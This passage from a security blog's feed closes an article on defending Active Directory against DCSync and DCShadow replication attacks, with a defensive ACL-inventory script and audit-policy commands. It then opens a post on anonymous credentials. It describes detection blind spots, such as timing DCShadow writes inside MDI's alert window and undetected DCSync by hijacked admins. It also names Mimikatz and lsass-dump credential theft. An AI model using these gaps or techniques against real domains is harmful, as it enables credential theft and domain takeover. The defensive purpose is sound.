&lt;p&gt;The honest structural fix would require a different replication architecture: a &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;TPM&lt;/a&gt;- or HSM-attested DC machine identity, bound to a sealed replication key, with secret attributes encrypted under that key on the wire. No caller without the sealed key (or its hardware-bound equivalent on a different DC) could ever decrypt the response.&lt;/p&gt;
&lt;p&gt;Microsoft has not announced any such architecture. Its closest published precedent in the Windows security stack is the &lt;a href=&quot;https://paragmali.com/blog/vbs-trustlets-what-actually-runs-in-the-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;LSAIso trustlet&lt;/a&gt; that Credential Guard uses for LSASS isolation -- a per-host isolation primitive applied to a per-host secret store. Applying the same idea to a multi-party wire protocol that must interoperate with twenty-five years of installed identity-sync tooling is a different engineering problem at a different scale. Microsoft has not committed to it.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The replication attack class is structurally permanent. The honest defender response is detection-and-response, not prevention.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is the article&apos;s humility moment. The reader who arrived at §5 thinking &quot;this is fixable&quot; should now understand why eleven years of attack/defense iteration have produced detection layers, not protocol revisions. The four-layer detection architecture is not a placeholder while we wait for Microsoft to ship the real fix. It is the real fix, conditional on the constraint that the protocol&apos;s job description does not change.&lt;/p&gt;
&lt;p&gt;If the protocol is structurally unfixable, what exactly does 2026 still not solve operationally?&lt;/p&gt;
&lt;h2&gt;9. What 2026 Still Cannot Do&lt;/h2&gt;
&lt;p&gt;Five problems sit on the open-questions register in 2026. Each is documented in the literature. None has a satisfying answer.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The DCShadow gap window.&lt;/strong&gt; MDI&apos;s External ID 2029 alert fires on the rogue DC&apos;s replication request, which is structurally &lt;em&gt;after&lt;/em&gt; the rogue &lt;code&gt;nTDSDSA&lt;/code&gt; registration has been committed. The alert documentation describes the detection as firing after the fact [@mdi-alerts-classic]. An attacker who completes the register-replicate-deregister cycle inside the alert&apos;s batch interval commits the persistence write before any SOC responder sees the alert. External ID 2028 (rogue promotion) fires earlier in the kill chain and partially closes the gap, but the gap is structural to the alert-batch model. The directory write that DCShadow lands -- a SID-history injection, an AdminSDHolder ACE re-grant -- survives the alert.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Encrypted-channel DCSync.&lt;/strong&gt; DRSUAPI clients that negotiate &lt;code&gt;AUTH_LEVEL_PKT_PRIVACY&lt;/code&gt; on the RPC binding (the modern hardened-DC default) encrypt the request and response bodies on the wire. Passive NDR sensors that depend on parsing the &lt;code&gt;IDL_DRSGetNCChanges&lt;/code&gt; request to determine which principal is being targeted lose per-principal granularity.&lt;/p&gt;
&lt;p&gt;The interface-bind packet is still in clear, so the existence of a DRSUAPI call is still visible, but the payload is not. The Microsoft channel-binding rollout that began in late 2023 (targeting LDAP rather than DRSUAPI, but cementing the broader trend toward encrypted directory traffic) makes this gap permanent on the wire side [@microsoft-ldap-channel-binding-kb4520412]. Detection moves into the DC itself via the MDI sensor model.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The legitimate-principal-compromise non-detection.&lt;/strong&gt; A hijacked Domain Admin session that uses its rightful DCSync ability triggers no layer. The posture layer sees a default principal. The behavioral layer sees a request from a DC or admin workstation that the Replication Allow List baseline accepts. The network layer sees the same. The graph layer sees the principal as a default Tier Zero member. The MDI alert is explicit: the trigger is &lt;em&gt;&quot;a computer that isn&apos;t a domain controller&quot;&lt;/em&gt; -- a compromised legitimate principal acting from a legitimately-baselined workstation does not fire it [@mdi-alerts-classic].&lt;/p&gt;
&lt;p&gt;This is the failure mode that catches mature SOCs. The attacker who already has Domain Admin does not need to attack DCSync detection because DCSync detection is not designed for legitimate principal abuse. UEBA-style per-principal anomaly detection (&lt;em&gt;&quot;this DA has not run DCSync in 90 days; this DA running DCSync at 03:00 from a workstation it has not used before is anomalous&quot;&lt;/em&gt;) is the partial answer. No production product currently delivers it with low enough false-positive rates to be operationally useful for already-Tier-Zero principals.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Cross-forest replication abuse is under-instrumented.&lt;/strong&gt; The interaction of &lt;code&gt;DS-Replication-Get-Changes-In-Filtered-Set&lt;/code&gt; with the SPN-suffix routing matrix in multi-forest environments is poorly covered in public detection guidance. Large enterprises with M&amp;amp;A history hold dozens of trusts; the cross-trust edges are the least-audited surface in their identity architecture. BloodHound&apos;s SharpHound collector can enumerate cross-trust data, and v6.0&apos;s wildcard-principal fix improves the picture, but no fully automated detection pattern exists [@bloodhound-v6-0-release-notes].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Delegation-drift residual long tail.&lt;/strong&gt; Even with the MDI Accounts security posture assessment perfectly tuned, the long tail of forgotten ACE delegations across a twenty-five-year-old forest with mergers, acquisitions, decommissioned products, and migrations remains the canonical entry point. Christopher Keim frames it unambiguously [@keim-dcsync-rights]:&lt;/p&gt;

&quot;The defaults aren&apos;t the problem. The problem is delegation drift, backup agents, identity sync products, and application service accounts accumulate these rights over time, often with no documentation and no review.&quot; -- Christopher Keim, *&quot;DCSync Attack: Finding and Fixing Replication Rights in Active Directory&quot;* (2025) [@keim-dcsync-rights]
&lt;p&gt;The posture-layer detection is necessary but not sufficient; the human-process loop -- documented ownership, periodic review, removal of unjustified ACEs -- is what closes the residual. Most enterprise SOCs are not staffed to run this loop at the cadence the residual requires.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Open problem&lt;/th&gt;
&lt;th&gt;Why it matters&lt;/th&gt;
&lt;th&gt;Current best partial result&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;DCShadow gap window&lt;/td&gt;
&lt;td&gt;Persistence write commits before SOC sees the alert&lt;/td&gt;
&lt;td&gt;Configure MDI to surface External ID 2028 (rogue promotion) with automated investigation and response to block RPC traffic from the suspected source [@mdi-credential-access-alerts]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Encrypted-channel DCSync&lt;/td&gt;
&lt;td&gt;Passive NDR loses per-principal granularity&lt;/td&gt;
&lt;td&gt;Hybrid deployment: NDR for cross-DC visibility, MDI on-DC sensor for per-principal granularity [@trellix-silent-domain-hijack]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Legitimate-principal compromise non-detection&lt;/td&gt;
&lt;td&gt;The Tier Zero principal who already has DCSync rights triggers nothing&lt;/td&gt;
&lt;td&gt;Reduce the count of DCSync-capable principals to a number a human can monitor; surface their DCSync activity to a high-severity review queue&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cross-forest replication abuse&lt;/td&gt;
&lt;td&gt;Cross-trust DCSync paths are not enumerated by default&lt;/td&gt;
&lt;td&gt;SharpHound trust-collection methods; manual BloodHound inspection of foreign-domain principals&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Delegation-drift residual long tail&lt;/td&gt;
&lt;td&gt;Posture surfaces the principals; humans still have to decide which are legitimate&lt;/td&gt;
&lt;td&gt;Quarterly posture review with documented justification per non-default principal&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;What can a defender actually do on Monday morning, given all of the above?&lt;/p&gt;
&lt;h2&gt;10. What a Defender Does on Monday Morning&lt;/h2&gt;
&lt;p&gt;Three action lanes, in priority order.&lt;/p&gt;
&lt;h3&gt;Lane 1: inventory the rights triad&lt;/h3&gt;
&lt;p&gt;Read the Domain NC root&apos;s ACL. Filter on the three rights GUIDs. Subtract the four default principal sets plus any legitimately delegated identity-sync product (Entra ID Connect&apos;s MSOL_ account is the canonical exclusion). Every entry that remains gets a documented owner and a documented justification, or the ACE gets removed.&lt;/p&gt;
&lt;p&gt;{`&lt;/p&gt;
Operator-facing inventory script. The browser-runnable demo uses a
hardcoded SAMPLE_ACL; in production, replace the SAMPLE_ACL with output
from one of:
PowerShell:  Get-Acl &quot;AD:$( (Get-ADDomain).DistinguishedName )&quot;
python-ldap: ldap_search(ncroot_dn, attr=&apos;nTSecurityDescriptor&apos;)
&lt;p&gt;GET_CHANGES          = &apos;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2&apos;
GET_CHANGES_ALL      = &apos;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2&apos;
GET_CHANGES_FILTERED = &apos;89e95b76-444d-4c62-991a-0facbeda640c&apos;
TRIAD = {GET_CHANGES, GET_CHANGES_ALL, GET_CHANGES_FILTERED}&lt;/p&gt;
&lt;p&gt;DEFAULT_OK = {
    &apos;BUILTIN\\Administrators&apos;,
    &apos;CONTOSO\\Domain Controllers&apos;,
    &apos;CONTOSO\\Domain Admins&apos;,
    &apos;CONTOSO\\Enterprise Admins&apos;,
    &apos;NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS&apos;,
}&lt;/p&gt;
MSOL_ accounts: legitimate Entra ID Connect sync principals.
Exclude by prefix, never by exact name (the suffix is random).
&lt;p&gt;def is_known_legitimate(principal):
    return principal in DEFAULT_OK or &apos;\\MSOL_&apos; in principal&lt;/p&gt;
&lt;p&gt;SAMPLE_ACL = [
    {&apos;principal&apos;: &apos;CONTOSO\\Domain Admins&apos;,     &apos;right&apos;: GET_CHANGES_ALL},
    {&apos;principal&apos;: &apos;CONTOSO\\MSOL_a1b2c3d4&apos;,     &apos;right&apos;: GET_CHANGES_ALL},
    {&apos;principal&apos;: &apos;CONTOSO\\backup_svc_2017&apos;,   &apos;right&apos;: GET_CHANGES_ALL},
    {&apos;principal&apos;: &apos;CONTOSO\\hr_idm_connector&apos;,  &apos;right&apos;: GET_CHANGES},
    {&apos;principal&apos;: &apos;CONTOSO\\fileserver_old$&apos;,   &apos;right&apos;: GET_CHANGES_ALL},
]&lt;/p&gt;
&lt;p&gt;findings = []
for ace in SAMPLE_ACL:
    if ace[&apos;right&apos;] not in TRIAD:
        continue
    if is_known_legitimate(ace[&apos;principal&apos;]):
        continue
    findings.append(ace[&apos;principal&apos;])&lt;/p&gt;
&lt;p&gt;print(&quot;Principals to investigate:&quot;)
for p in sorted(set(findings)):
    print(f&quot;  - {p}  -&amp;gt;  document owner or remove ACE&quot;)
`}&lt;/p&gt;
&lt;p&gt;Anything in the &lt;em&gt;Principals to investigate&lt;/em&gt; output is either a legitimately delegated service (document the owner and add to your exclusions; treat as Tier Zero) or a forgotten ACE from a project nobody remembers (remove it). Christopher Keim&apos;s framing is the operationally useful one: every common culprit is a backup tool, an identity-governance tool, or a service account from a long-dead migration [@keim-dcsync-rights].&lt;/p&gt;

The Microsoft Entra ID Connect synchronization service account, created on-premises during Entra Connect installation with an `MSOL_` prefix and a random hex suffix, legitimately holds the rights triad on the Domain NC root. It must -- it has to replicate password hashes to the cloud directory so that Entra ID can validate cloud logons against on-premises credentials. Removing its ACE breaks Entra ID password hash sync within a single replication interval, and your help desk will know about it.&lt;p&gt;The right answer is not to remove the ACE. It is to treat the MSOL_ account as Tier Zero. Dedicated host (the Entra Connect server itself, hardened as a DC-tier asset). No interactive logon. Multi-factor authentication on any privileged use. Conditional access policies that block sign-in from anything other than the Entra Connect service identity. The MDI Hybrid security posture-assessment family documents the surrounding controls [@mdi-security-posture-hybrid].
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h3&gt;Lane 2: enable the canonical alerts and audit&lt;/h3&gt;
&lt;p&gt;Three configuration items.&lt;/p&gt;
&lt;p&gt;First, ensure Microsoft Defender for Identity (or an equivalent identity-threat-detection product) is deployed with a sensor on every DC. The un-sensored-DC gap that the MDI alert documentation explicitly warns about creates a structural blind spot that an attacker will preferentially target [@mdi-alerts-classic].&lt;/p&gt;
&lt;p&gt;Second, enable Advanced Security Audit policy &lt;code&gt;Audit Directory Services Access&lt;/code&gt; under &lt;code&gt;DS Access&lt;/code&gt; and apply SACLs on the Domain NC root that audit the three replication rights against &lt;code&gt;Everyone&lt;/code&gt;, &lt;code&gt;Domain Computers&lt;/code&gt;, and &lt;code&gt;Domain Controllers&lt;/code&gt;. This is what makes Event ID 4662 fire on the request, which is what the Sigma 611eab06 and Splunk 51307514 rules consume [@sigma-rule-dcsync][@splunk-research-dcsync]. A fresh-install AD does not have these SACLs by default; the most common reason a SIEM dashboard for DCSync is silent is that the SACL never got applied.&lt;/p&gt;
&lt;p&gt;Third, deploy or configure NDR coverage on the inter-DC subnet, with a rule that fires on DRSUAPI bind requests originating from source IPs outside the legitimate-DC baseline. Trellix NDR, Microsoft&apos;s MDI sensor, CrowdStrike Falcon, and community Zeek/Suricata rulesets all implement this [@trellix-silent-domain-hijack]. Where commercial NDR is out of budget, Sysmon with the SwiftOnSecurity or Olaf Hartong modular configuration surfaces Event ID 3 (NetworkConnect) and Event ID 22 (DnsQuery) outbound from non-DC hosts to DC RPC endpoints; a SIEM correlation rule can combine this endpoint-side signal with Event ID 4662 on the DC to approximate the network-plus-host signature without an appliance budget.&lt;/p&gt;
&lt;h3&gt;Lane 3: run BloodHound on the domain quarterly&lt;/h3&gt;
&lt;p&gt;Collect with SharpHound at minimum quarterly. Continuous collection if BloodHound Enterprise is available. Run the canonical query for the &lt;code&gt;DCSync&lt;/code&gt; edge into the domain node. Trace inbound paths. Close the longest path first -- the longest paths are the ones a human operator is least likely to have noticed and most likely to have been delegated decades ago for a reason nobody remembers.&lt;/p&gt;
&lt;p&gt;The v6.0 wildcard-principal fix is particularly worth a re-run on any forest that has been operated since before 2003: legacy &lt;code&gt;Authenticated Users&lt;/code&gt; or &lt;code&gt;Everyone&lt;/code&gt; ACEs on the domain root are exactly the kind of thing that survived a Server 2003 upgrade silently and never showed up in any subsequent audit [@bloodhound-v6-0-release-notes]. The v6.3 Butterfly algorithm lets you query the inverse view -- &lt;em&gt;which targets fall if this principal is compromised?&lt;/em&gt; -- which is the right question to ask about any newly-discovered non-default DCSync holder [@specterops-butterfly-blog][@bloodhound-v6-3-release-notes].&lt;/p&gt;
&lt;h3&gt;What does not work&lt;/h3&gt;
&lt;p&gt;Four common misbeliefs are worth naming.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; See §1 -- Credential Guard does not stop DCSync. The secret transits remote-to-remote (a DC&apos;s NTDS.dit to the attacker&apos;s process), never local-to-LSASS, so the trustlet&apos;s isolation boundary has no jurisdiction over the call [@credential-guard-considerations]. Credential Guard is the right control for the local-memory attack surface and the wrong control for the network-protocol attack surface.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; After a confirmed DCSync of &lt;code&gt;krbtgt&lt;/code&gt;, rotate the &lt;code&gt;krbtgt&lt;/code&gt; account password twice, with at least ten hours between rotations. The first rotation invalidates the old key after the current Kerberos ticket lifetime expires. The second rotation invalidates the &lt;em&gt;previous&lt;/em&gt; old key, which the directory stores alongside the current key for compatibility during replication convergence. Rotating only once leaves Golden Tickets forged from the dumped key valid for the duration of the second key. Rotating twice ten hours apart is what closes the window [@microsoft-new-krbtgtkeys]. (And neither rotation removes the ACE that allowed the dump in the first place: come back to Lane 1.)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Renaming &lt;code&gt;krbtgt&lt;/code&gt; does nothing. The account&apos;s Relative Identifier (RID 502) is fixed by AD&apos;s design and is what the TGT signing key derives against, not the &lt;code&gt;sAMAccountName&lt;/code&gt; [@microsoft-well-known-sids]. Renaming it to &lt;code&gt;krbtgt-old-do-not-use&lt;/code&gt; confuses operators, not attackers.&lt;/p&gt;
&lt;p&gt;Disabling MS-DRSR is not an option. The protocol is what makes AD replication work. Blocking opnum 3 at the RPC layer or refusing the DRSUAPI bind stops DCSync and stops every DC in the forest from talking to every other DC. Replication grinds. Password changes do not propagate. Domain joins fail. Within hours, the directory is split-brain across DCs, and within days, it is unrecoverable without DR-grade restore from backup: Microsoft&apos;s own AD-replication troubleshooting documentation walks the lingering-object pathology that produces exactly this split-brain when DCs stop replicating for longer than the tombstone lifetime [@microsoft-ad-lingering-objects].&lt;/p&gt;

On any DC, run `auditpol /get /subcategory:&quot;Directory Service Access&quot;` from an elevated prompt. If the output reads `No Auditing`, your Sigma / Splunk SACL-event detection will not fire because Event ID 4662 is not being generated. Enable with `auditpol /set /subcategory:&quot;Directory Service Access&quot; /success:enable /failure:enable`, then apply the SACL on the domain root as described in the Splunk rule&apos;s implementation notes [@splunk-research-dcsync].
&lt;p&gt;The six FAQ items in the next section cover the misconceptions that did not fit into any single lane.&lt;/p&gt;
&lt;h2&gt;11. Frequently Asked Questions&lt;/h2&gt;

No. The access check on `IDL_DRSGetNCChanges` requires both the baseline `DS-Replication-Get-Changes` right *and* `DS-Replication-Get-Changes-All` to read secret attributes [@ad-schema-get-changes][@ad-schema-get-changes-all]. The *All* suffix unlocks the secret attribute set given the baseline right; it is not a self-sufficient gate. Christopher Keim&apos;s PowerShell pattern filters on both GUIDs together [@keim-dcsync-rights]. Confidential-flag attributes additionally require `DS-Replication-Get-Changes-In-Filtered-Set`. Some detection rules (Sigma 611eab06 included) accept either GUID in the SACL event because the operational cost of a false positive on the broader filter is lower than the risk of missing one of the two required ACEs being present without the other [@sigma-rule-dcsync].

No. Credential Guard isolates LSASS-resident secrets in a separate virtual trust level so that local-memory attacks (Mimikatz `sekurlsa::logonpasswords`, comsvcs.dll mini-dumps of `lsass.exe`, and similar) cannot read cached credentials. DCSync does not touch the attacker&apos;s LSASS at all. The secret transits from a remote DC&apos;s NTDS.dit, over an encrypted MS-DRSR session, into the attacker&apos;s process memory. Microsoft&apos;s Credential Guard documentation lists the scenarios Credential Guard does and does not cover; MS-DRSR-based network credential extraction is not in scope [@credential-guard-considerations]. This is one of the clearest examples in the Windows security model of a control that is right for one attack surface and orthogonal to another.

Not anymore. The BlueHat IL 2018 &quot;your million-dollar SIEM goes blind&quot; framing was correct in 2018 against SIEMs that monitored only object-modification events: the replication writes are SACL-silent. By July 24, 2018, Tali Ash announced Azure ATP&apos;s two new preview detections, which fired on the rogue-DC promotion fingerprint (creating an `nTDSDSA` object in the Configuration NC) and the replication request from the rogue, respectively [@tali-ash-azure-atp-dcshadow]. Those detections carried forward as Microsoft Defender for Identity External IDs 2028 and 2029 [@mdi-alerts-classic]. The writes themselves remain SACL-silent; the *registration* fingerprint that has to precede them is not. The honest contemporary statement is &quot;DCShadow&apos;s writes are silent, but the rogue-DC scaffolding is not, and a sensored DC catches the scaffolding.&quot; A skilled attacker who completes the register-replicate-deregister cycle inside the alert batch interval may still commit the persistence write before SOC response.

No. The protocol&apos;s design is the issue. Microsoft has not announced any MS-DRSR amendment that would change the `IDL_DRSGetNCChanges` access check, because amending the access check breaks legitimate non-DC consumers (the Entra ID Connect MSOL_ account is the most prominent) and shifts the attack class to compromised DC machine accounts (Zerologon is the worked example [@secura-zerologon-whitepaper]). The &quot;fixes&quot; that have shipped since 2015 are all detection: ATA 1.7 (April 2017) [@ata-v17-release-notes], Azure ATP (2018) [@tali-ash-azure-atp-dcshadow], Microsoft Defender for Identity (post-Ignite 2020 rebrand) [@rcpmag-defender-rebrand][@mdi-whats-new], and the posture-assessment families that surface non-default rights triad holders [@mdi-security-posture-accounts]. The protocol itself is the same protocol it was in Windows 2000 Server.

The MSOL_ sync account legitimately holds the rights triad on the Domain NC root because it must replicate password hashes to Entra ID. Treat it as Tier Zero with the hardening profile listed in §10&apos;s MSOL_ Aside (dedicated hardened host, no interactive logon, MFA on privileged use, conditional access restricted to the Entra Connect service identity) [@mdi-security-posture-hybrid]. Critically, do *not* remove the ACE from the Domain NC root: doing so breaks Entra ID password hash sync within one replication interval, and your help desk will know about it within hours.

No. DCSync is over DRSUAPI/MS-DRSR, not over LDAP. The directory&apos;s LDAP service refuses to return `unicodePwd` and related secret-attribute values regardless of caller privilege, because the attribute is marked confidential and the LDAP read path does not honor the replication extended rights. There is no &quot;DCSync over LDAP&quot; technique because LDAP simply does not return the data; MITRE T1003.006 names DRSUAPI explicitly as the protocol vector [@mitre-t1003-006]. Operators occasionally confuse this with LDAPS (LDAP over TLS) or with the November 2023 LDAP signing and channel-binding rollout, both of which are channel-protection concerns rather than credential-read concerns.
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;dcsync-dcshadow-and-the-domain-replication-attack-class&quot; keyTerms={[
  { term: &quot;MS-DRSR&quot;, definition: &quot;Directory Replication Service Remote Protocol; the RPC interface by which any AD domain controller can replicate any object including secret attributes from any other DC.&quot; },
  { term: &quot;IDL_DRSGetNCChanges&quot;, definition: &quot;MS-DRSR&apos;s opnum-3 method that returns changed objects within a naming context; the protocol method DCSync invokes.&quot; },
  { term: &quot;Extended Right&quot;, definition: &quot;A schema-defined access-control right keyed by GUID rather than by standard ACL bit. Granted via ACE; checked at runtime by the operation that requires it.&quot; },
  { term: &quot;Naming Context&quot;, definition: &quot;A top-level replication partition of the Active Directory database. DCSync operates against the Domain NC root.&quot; },
  { term: &quot;Rights Triad&quot;, definition: &quot;DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, and DS-Replication-Get-Changes-In-Filtered-Set extended rights on a naming-context root.&quot; },
  { term: &quot;NTDS.dit&quot;, definition: &quot;The on-disk Extensible Storage Engine database holding every AD object including secret attributes.&quot; },
  { term: &quot;SACL-silent&quot;, definition: &quot;A directory operation that does not generate the Event ID 4662/4738/5136 events normally emitted by Domain Services Auditing. Legitimate DC-to-DC replication is SACL-silent by design.&quot; },
  { term: &quot;Tier Zero&quot;, definition: &quot;Principals and assets whose compromise yields domain-wide control. KRBTGT, Domain Admins, the MSOL_ account, and any principal holding the rights triad are all Tier Zero.&quot; },
  { term: &quot;MSOL_ account&quot;, definition: &quot;The Entra ID Connect synchronization service account; legitimately holds the rights triad to replicate password hashes to the cloud directory.&quot; },
  { term: &quot;Replication Allow List&quot;, definition: &quot;MDI&apos;s internal baseline of which computers in the domain legitimately speak DRSUAPI to which DCs.&quot; }
]} flashcards={[
  { front: &quot;What does MS-DRSR §4.1.10 check on IDL_DRSGetNCChanges?&quot;, back: &quot;Only that the calling principal holds the rights triad on the naming-context root. It does not check whether the caller is a domain controller.&quot; },
  { front: &quot;What is the Mimikatz commit hash and date for DCSync&apos;s introduction?&quot;, back: &quot;Commit 7717b7a7173fa6a6b6566bbbc3e7372b464d988f, authored by Benjamin DELPY on 2015-08-11 01:27:13 +0200, subject &apos;DCSync in mimikatz &amp;amp; for XP/2003&apos;.&quot; },
  { front: &quot;What are MDI&apos;s three DCSync/DCShadow alert IDs?&quot;, back: &quot;External ID 2006 (DCSync), 2028 (DCShadow promotion), 2029 (DCShadow replication request).&quot; },
  { front: &quot;Why can&apos;t Microsoft patch DCSync?&quot;, back: &quot;Two structural ceilings: stopping the protocol from returning secrets breaks AD replication; adding a machine-identity check shifts the attack class to compromised DC machine accounts (Zerologon).&quot; },
  { front: &quot;What is the BloodHound v6.3 &apos;Butterfly&apos; algorithm?&quot;, back: &quot;Bi-directional impact analysis: in addition to &apos;which principals can reach this target?&apos;, also computes &apos;which targets fall if this principal is compromised?&apos;.&quot; }
]} questions={[
  { q: &quot;Why does adding a caller-machine-identity check to MS-DRSR not close the attack class?&quot;, a: &quot;Because compromising a DC&apos;s machine account (CVE-2020-1472 Zerologon being the canonical worked example) satisfies the new check while still enabling the original attack.&quot; },
  { q: &quot;Why is Credential Guard the wrong control for DCSync?&quot;, a: &quot;Credential Guard isolates LSASS-resident secrets on the local machine. DCSync reads secrets from a remote DC&apos;s NTDS.dit over MS-DRSR; the secret never transits the attacker&apos;s LSASS.&quot; },
  { q: &quot;Why must the krbtgt password be rotated twice after a confirmed DCSync?&quot;, a: &quot;Each AD account stores both the current and previous password. Rotating once invalidates only the older of the two keys; the most recently dumped key remains valid. Rotating a second time, after the first replication interval has converged, invalidates the dumped key.&quot; },
  { q: &quot;What does each of the four defense layers miss?&quot;, a: &quot;Posture misses transitive paths. Behavioral misses pre-attack staging and compromised-DC speakers. Network misses encrypted RPC payloads. Graph misses net-new ACEs created after the last collection.&quot; },
  { q: &quot;Why is the DCShadow gap window structural?&quot;, a: &quot;MDI External ID 2029 fires on the rogue&apos;s replication request after registration. An attacker who completes register-replicate-deregister inside the alert batch interval commits the persistence write before SOC response.&quot; }
]} /&amp;gt;&lt;/p&gt;
&lt;p&gt;A final observation, since the closing should add something new. The protocol that this article calls structurally unfixable is not unusual. Most Microsoft security primitives that survive long enough enter the same regime -- the LSASS surface, the Kerberos delegation surface, the SMB authentication surface -- where the only honest answer is detection in depth because the protocol&apos;s job description and its abuse surface are the same surface viewed from different chairs.&lt;/p&gt;
&lt;p&gt;The thing that makes MS-DRSR notable is the &lt;em&gt;clarity&lt;/em&gt; with which the structural error is visible. Read §4.1.10 once and you are done. Everything from §6 onward is the industry&apos;s slow accumulation of detection layers around a gate that cannot be moved. Twenty-five years in, the gate is still where it was on February 17, 2000, and the four layers around it are still under active engineering.&lt;/p&gt;
</content:encoded><category>active-directory</category><category>dcsync</category><category>dcshadow</category><category>ms-drsr</category><category>credential-theft</category><category>defender-for-identity</category><category>bloodhound</category><category>kerberos</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>The Age Gate That Doesn&apos;t Know Your Age: How Anonymous Credentials Finally Crossed the Deployment Chasm</title><link>https://paragmali.com/blog/the-age-gate-that-doesnt-know-your-age-how-anonymous-credent/</link><guid isPermaLink="true">https://paragmali.com/blog/the-age-gate-that-doesnt-know-your-age-how-anonymous-credent/</guid><description>Forty years after David Chaum&apos;s manifesto, anonymous credentials -- Privacy Pass, BBS, SD-JWT, Longfellow-zk -- have shipped into every major browser.</description><pubDate>Wed, 20 May 2026 00:00:00 GMT</pubDate><content:encoded>
Anonymous credentials -- cryptographic schemes that prove a claim about a person without revealing identity -- spent forty years in academic papers and have, in the last eighteen months, crossed the deployment chasm. The Privacy Pass family (IETF RFCs 9576, 9577, and 9578, all June 2024) now serves anti-abuse attestation at internet scale across Cloudflare, Apple, Google Chrome, and Microsoft Edge. For multi-attribute credentials, four schemes are racing for the EUDI Wallet and mDL slot -- BBS, SD-JWT (RFC 9901, November 2025), the ISO/IEC 18013-5 mdoc baseline, and Google&apos;s open-sourced Longfellow-zk SNARK-over-ECDSA library -- with the EU age-verification app, announced &quot;technically ready&quot; on 15 April 2026, the first population-scale test. Revocation under unlinkability, post-quantum security, and cross-platform interop remain unsolved.
&lt;h2&gt;1. A Press Conference, Forty-One Years Late&lt;/h2&gt;
&lt;p&gt;On 15 April 2026, Ursula von der Leyen stood at a Commission lectern in Brussels and announced that the European Union&apos;s age-verification app was &quot;technically ready.&quot; The app, she said, is &quot;completely anonymous, works on any device, and is fully open source&quot;[@ec-2026-age-app].&lt;/p&gt;
&lt;p&gt;Forty-one years earlier, in October 1985, a Berkeley cryptographer named David Chaum had described the same idea in &lt;em&gt;Communications of the ACM&lt;/em&gt;: a system in which a citizen could prove a fact about themselves -- over eighteen, holds a driver&apos;s licence, has paid the toll -- without revealing who they are, and without two presentations of that proof being linkable to each other[@chaum-1985-doi].&lt;/p&gt;
&lt;p&gt;For four decades Chaum&apos;s framing lived almost entirely in cryptography conferences. In the last eighteen months it has shipped into every major browser, into IETF Standards-Track RFCs, into Google&apos;s open-source zero-knowledge library, and -- if Brussels delivers on its 24 December 2026 deadline -- into roughly 450 million European pockets[@eidas2].&lt;/p&gt;
&lt;p&gt;Two days after the Commission press conference, the Johns Hopkins cryptographer Matthew Green published Part 2 of his &lt;em&gt;Anonymous Credentials: An Illustrated Primer&lt;/em&gt;, an unusual two-part deep-technical exposition aimed at engineers. Part 1, published 2 March 2026, lays out the formal Issuer / User / Resource model and the unlinkability requirement[@green-2026-part1]. Green&apos;s framing in Part 2 has since become the field&apos;s working summary: Privacy Pass, the IETF anti-abuse token scheme deployed by Cloudflare and Apple and shipped into Chrome and Edge, &quot;is the most widely-deployed anonymous credential standard in the world&quot;[@green-2026-part2].&lt;/p&gt;

Privacy Pass... is the most widely-deployed anonymous credential standard in the world. -- Matthew Green, *Anonymous Credentials: An Illustrated Primer (Part 2)*, 17 April 2026
&lt;p&gt;Three layers of the stack shipped at different times for different reasons.&lt;/p&gt;
&lt;p&gt;At the &lt;strong&gt;hardware layer&lt;/strong&gt;, the Trusted Computing Group first specified &lt;a href=&quot;https://paragmali.com/blog/direct-anonymous-attestation-the-zero-knowledge-proof-alread/&quot; rel=&quot;noopener&quot;&gt;Direct Anonymous Attestation&lt;/a&gt; in the &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;TPM 1.2 Main Specification&lt;/a&gt; in 2005 using an RSA-based construction (Brickell-Camenisch-Chen) -- the first anonymous credential primitive ever burned into commodity silicon -- and re-defined it in elliptic-curve form (ECDAA) in the TPM 2.0 Library Specification in October 2014[@tpm-2-spec][@daa-2004-doi]. It sat largely dormant because the algorithm is optional and consumer-TPM vendors did not enable it.&lt;/p&gt;
&lt;p&gt;At the &lt;strong&gt;network layer&lt;/strong&gt;, Cloudflare engineers in 2017 took an academic primitive called a verifiable oblivious pseudorandom function and built a one-bit anonymous token that proves a client solved a CAPTCHA. That scheme became Privacy Pass, became three IETF RFCs in June 2024, and now sits behind Apple&apos;s Private Access Tokens, Chrome&apos;s Private State Tokens, and Cloudflare&apos;s anti-abuse pipeline[@rfc9576][@rfc9577][@rfc9578].&lt;/p&gt;
